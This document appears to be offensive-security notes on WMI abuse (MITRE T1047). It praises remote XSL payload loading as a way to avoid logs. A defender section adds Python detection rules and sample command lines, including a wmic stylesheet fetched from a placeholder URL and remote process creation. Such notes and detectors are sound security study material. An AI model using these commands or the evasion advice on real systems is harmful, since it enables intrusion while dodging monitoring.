# T1047: Windows Management Instrumentation

Adversaries may abuse Windows Management Instrumentation (WMI) to achieve code execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and on Server Message Block (SMB) and the Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.

An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement.

There are many useful things we can do with wmic (the WMI command line), both locally and against remote hosts.

Enumerating locally, we can grab valuable info such as Name, Manufacturer, Model, Domain and Description:

![](/files/-MRhG_o5wjyq0DEzo18o)

Environment:

![](/files/-MRhGaVf8qMgGI_tDOCo)

Users and groups:

![](/files/-MRhGbKoyC1drTQqD_vc)

Missing patches:

![](/files/-MRhGcDaeG6sNKtGLPAP)

Execution of an XSL file:

![](/files/-MRhGczo03lR4c8LBxVJ)

Execution: we can create a process and execute code.

![](/files/-MRhGdgvTnfwk5-vVsCO)

Wmic is proxy aware, so it can also call an XSL file from a remote host that contains our payloads. This is a great method to avoid logs, as it is very uncommonly used and OPSEC safe for environments.
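From the defender's side, both behaviours described above (process creation through WMI and a stylesheet pulled from a remote host) leave traces in process-creation telemetry. The following is an added example, not part of the original notes, that runs a few detection rules over constructed process-creation records in a simplified `key="value"` form modelled on Windows Security 4688 / Sysmon Event ID 1 fields. The field names, host name `HOST01`, URL `example.invalid` and command lines are all made up for the example.

```python
import re
from typing import Dict, List

# Constructed sample process-creation records (not real captures), in a
# simplified key="value" layout loosely modelled on 4688 / Sysmon EID 1 fields.
SAMPLE_EVENTS = [
    # Local inventory from an interactive shell: benign admin use
    'NewProcessName="C:\\Windows\\System32\\wbem\\WMIC.exe" '
    'ParentProcessName="C:\\Windows\\System32\\cmd.exe" '
    'CommandLine="wmic computersystem get name,manufacturer,model,domain"',
    # Patch inventory: benign admin use
    'NewProcessName="C:\\Windows\\System32\\wbem\\WMIC.exe" '
    'ParentProcessName="C:\\Windows\\System32\\cmd.exe" '
    'CommandLine="wmic qfe list brief"',
    # Stylesheet fetched from a remote host (the proxy-aware XSL case)
    'NewProcessName="C:\\Windows\\System32\\wbem\\WMIC.exe" '
    'ParentProcessName="C:\\Windows\\System32\\cmd.exe" '
    'CommandLine="wmic os get /format:http://example.invalid/x.xsl"',
    # Process creation on a remote node through WMI (hypothetical host name)
    'NewProcessName="C:\\Windows\\System32\\wbem\\WMIC.exe" '
    'ParentProcessName="C:\\Windows\\System32\\cmd.exe" '
    'CommandLine="wmic /node:HOST01 process call create notepad.exe"',
    # On the receiving side: the new process is a child of the WMI provider host
    'NewProcessName="C:\\Windows\\System32\\cmd.exe" '
    'ParentProcessName="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe" '
    'CommandLine="cmd.exe /c notepad.exe"',
]

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key="value" record into a dict of its quoted fields."""
    return {key: value for key, value in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (last backslash component)."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules that fire for one parsed event."""
    hits: List[str] = []
    image = basename(event.get("NewProcessName", ""))
    parent = basename(event.get("ParentProcessName", ""))
    cmd = event.get("CommandLine", "").lower()

    # Win32_Process.Create spawns the new process under WmiPrvSE.exe, so a
    # shell or script host whose parent is the provider host is the classic
    # telltale of WMI-driven execution, local or remote.
    if parent == "wmiprvse.exe":
        hits.append("child-of-wmiprvse")

    if image == "wmic.exe":
        # /format: pointing at an http(s) URL or UNC path: stylesheet loaded
        # from somewhere other than the local machine.
        if re.search(r"/format:\S*(https?:|\\\\)", cmd):
            hits.append("wmic-remote-xsl")
        if "process call create" in cmd:
            hits.append("wmic-process-create")
        if "/node:" in cmd:
            hits.append("wmic-remote-node")
    return hits


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run every rule over every record and collect the ones that matched."""
    alerts: List[Dict[str, object]] = []
    for line in lines:
        event = parse_event(line)
        hits = detect(event)
        if hits:
            alerts.append({"command": event.get("CommandLine", ""), "rules": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(", ".join(alert["rules"]), "<-", alert["command"])
```

The two benign inventory commands produce no alert, while the remote stylesheet, the remote `process call create` and the `WmiPrvSE.exe` child each fire at least one rule. The parent-process rule is the one worth keeping even where command-line logging is off: it does not depend on wmic being the client at all, so it also covers PowerShell or scripted callers of `Win32_Process.Create`.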

